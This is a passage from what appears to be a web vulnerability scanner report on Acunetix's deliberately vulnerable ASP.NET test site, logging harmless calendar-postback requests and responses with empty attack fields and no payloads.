to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8129&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA3g%2FOFdoIZGRkmHaSD7xMoZW8VoLV4g8813xb9uY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLl9O6PDwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDC%2BSJq2TM%2FOmlazIh%2FuxnpLL33u%2F
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:01:11 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA3g/OFdoIZGRkmHaSD7xMoZW8VoLV4g8813xb9uY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLl9O6PDwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDC+SJq2TM/OmlazIh/uxnpLL33u/" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:White" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8590&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgDATHAPgNsIZGRk5niDsijuK9wOEpB7eBjGt7t7c4M%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLljs6sCQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsSa1r135GSX525XiVFGddkOKa1V
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:22 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgDATHAPgNsIZGRk5niDsijuK9wOEpB7eBjGt7t7c4M=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLljs6sCQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsSa1r135GSX525XiVFGddkOKa1V" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:White" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting 